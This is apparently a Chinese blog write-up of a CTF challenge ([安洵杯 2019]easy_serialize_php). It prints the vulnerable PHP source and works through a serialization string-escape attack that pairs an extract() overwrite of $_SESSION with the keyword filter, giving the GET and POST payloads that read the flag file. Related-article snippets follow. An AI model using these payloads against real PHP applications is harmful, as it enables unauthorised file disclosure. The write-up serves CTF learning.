一天一道ctf 第30天(反序列化字符串逃逸)

最新推荐文章于 2023-10-24 00:44:37 发布
最新推荐文章于 2023-10-24 00:44:37 发布
阅读量211 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/118675358
版权

[安洵杯 2019]easy_serialize_php

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

从源码和标题就可以看出来这是一道序列化的题目,并且对序列化后的字符串替换掉了flag,php等字符然后再反序列化,那就肯定会出问题了。题目有提示我们查看phpinfo,在里面可以发现附加文件d0g3_f1ag.php,直接访问是行不通的,要通过上面的file_get_contents()函数。
在这里插入图片描述
在正常情况下_SESSION里有三个键值对,user,function和img。我们的目标是让img的值等于d0g3_f1ag.php base64加密后的值ZDBnM19mMWFnLnBocA==。但是因为下面这段代码直接通过GET传的话是不行的,会被哈希掉。
在这里插入图片描述
所以干脆就不在GET中传img_path了,而是把img藏在function里,再通过字符串长度逃逸覆盖掉原本
在这里插入图片描述
上面是我构造的序列化字符串,作为之后function的值:
a:2:{s:8:"function";s:6:"123edr";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

在这里插入图片描述
再来构造真正POST传的user和function的值,因为flag和php会被替换成空格,所以user会向后继续吞噬24个字符,图中标蓝的就是被吞噬的字符,它们会变成user的值。过滤后的序列化字符串就变成了
-----------------------| - - - 24 个 字 符 - - - - |
{s:4:"user";s:24:"";s:8:"function";s:87:"{"s:8:"function";s:6:"123edr";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

所以最后GET传值f=show_image
POST传值

_SESSION[user]=flagphpflagphpflagphpphp&_SESSION[function]={";s:8:"function";s:6:"123der";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

查看网页源代码提示我们flag在另外一个文件里,其实我觉得这步没啥必要,还是故技重施(这里记得要把/也加进去)
在这里插入图片描述
POST传值

_SESSION[user]=flagphpflagphpflagphpphp&_SESSION[function]={";s:8:"function";s:6:"123der";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

傻缺虚拟机一直装不上去,下了2500多个文件五个小时结果最后几步出错了,血压都上来了。因此这次写的比较简略,关于反序列化更多的题目可以看我之前写的文章。
想对电脑说一句:你礼貌吗?

scrawman
关注
CTF之php反序列化字符逃逸
世间繁华梦一出
06-08 467
首先源代码如下 <?php include_once 'flag.php'; highlight_file(__FILE__); // Security filtering function function filter($str){ return str_replace('secure', 'secured', $str); } class Hacker{ public $username = 'margin';
浅析php反序列化字符串逃逸
Lemon's blog
08-26 3157
前言: php反序列化字符串逃逸之前没有详细的学习过,所以遇到题目看的有点懵,这次好好学习一下。 反序列化的特点 首先要了解一下反序列化的一些特点: php在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 class A{ public $name='shy'; public $pass='123456'; } $lemon = new A(); echo serialize
NewStarCTF2023week4-逃(反序列化字符串逃逸
最新发布
Welcome To Myon'Blog !
10-24 1028
反序列化的时候php会根据s所指定的字符长度去读取后边的字符,由于在序列化操作后又使用了str_replace()函数进行字符串替换,这就可能会改变字符串的长度,比如上面将bad替换为good,每替换掉一个bad,字符串长度明显就增加了1,而由于序列化之后s的值没变,但是进行了内容替换,改变了字符串长度,那么反序列化读取时,就并不能将原本的内容读取完全。得到:O:7:"GetFlag":2:{s:3:"key";而后面没有被读到的内容,也就是逃逸出来的字符串,就会被当做当前类的属性被继续执行。
CTFshow新春欢乐赛--web6--反序列化字符串逃逸
unexpectedthing的博客
02-09 1877
web6 考点:反序列化数组+字符串逃逸 这道题还是挺有意思的,首先看代码 <?php error_reporting(0); highlight_file(__FILE__); $function = $_GET['POST']; function filter($img){ $filter_arr = array('ctfshow','daniu','happyhuyear'); $filter = '/'.implode('|',$filter_arr).'/i';
ctf 反序列化字符逃逸
giaogiao123的博客
12-17 953
第一种,关键词过滤,变多的 比如0ctf :piapiapia 我先说一次什么是反序列化字符逃逸。 <?php class user{ public $user = 'admin'; public $pass = 'passwd'; } $a = new user(); $b = serialize($a); echo $b."<br>";
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 1940
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP的反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
【PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸)
Sea_Sand息禅
07-21 6548
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $...
一天一道ctf 第33天(反序列化字符串逃逸
scrawman的博客
07-15 316
看界面很像sql注入,但是试了几次发觉不太行。dirsearch扫一下目录,找到了www.zip文件。 profile.php里有反序列化的代码,应该可以利用: <?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } $username = $_SESSION['username']; $profile=$user->show_profile($use.
ctf之php反序列化字符串数组逃逸(转自最详细的大佬)2021-9-9
qq_45290991的博客
09-09 677
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样...
unctf easy_serialize反序列化字符逃逸
qq_51796436的博客
01-29 387
web题难度适中。
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
末初的CSDN博客
10-16 3772
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
反序列化字符串逃逸——初体验
D.MIND 的博客
02-27 1476
前言:从CTFshow上做的一道反序列化字符串逃逸的题,第一次接触,想了半天(可能是我太菜了>__<)后来才发现其实不难理解,真的需要动手写脚本操作一下,光看不好理解 题目链接 message.php: <?php highlight_file(__FILE__); include('flag.php'); class message{ public $from; public $msg; public $to; public $token='user
一道ctf题关于php反序列化字符逃逸
BerL1n
07-18 2421
2019强网杯 easy_sql 这题知识点堆叠注入;以前还未遇到过 这是过滤掉的内容,因此常见的注入方式我们是不能再使用了。 然后提交试试。发现似乎是直接把返回的原始数据给返回了。 3.然后来测试一下有没有注入,似乎是有的。 /?inject=1%27or+%271%27%3D%271 /?inject=1’ or ‘1’='1 4.来检查一下过滤情况,过滤函数如下。 过滤了 select,u...
DASCTF-Esunserialize(反序列化字符逃逸)
Vicl1fe的博客
04-25 4196
环境 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { return str_replace('\0\0\0', chr(0) . '*' . ...
CTF:PHP反序列化字符逃逸漏洞
06-16 1393
作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.16 22:26、。/>/ CTF入门好难 赛后,主办方给出答案后的第77天,我终于解开了这道题。 CTF作为流行在信息安全界著名竞赛,像我这种“被赶鸭子上架的程序员”——零基础。答案都看不懂,我太难了!不了解原理和背景,资料也无从找起。输了比赛不可怕,就怕输的不明不白,抱着这种不甘,也为了探究缘故,除了努力学习别无它法,期间走了不少弯路,终得解惑。这对于我来说,没有激动与喜悦,有得只是深刻。 现将解题过程分享出
buuctf easy_serialize_php
qq_52671379的博客
03-30 1914
buuctf easy_serialize_php
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
weixin_44632787的博客
07-28 1833
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计 知识点 反序列化中的对象逃逸 extract()变量覆盖 虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来… 废话不多说,放代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','
------已搬运-------BUUCTF:[安洵杯 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 651
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值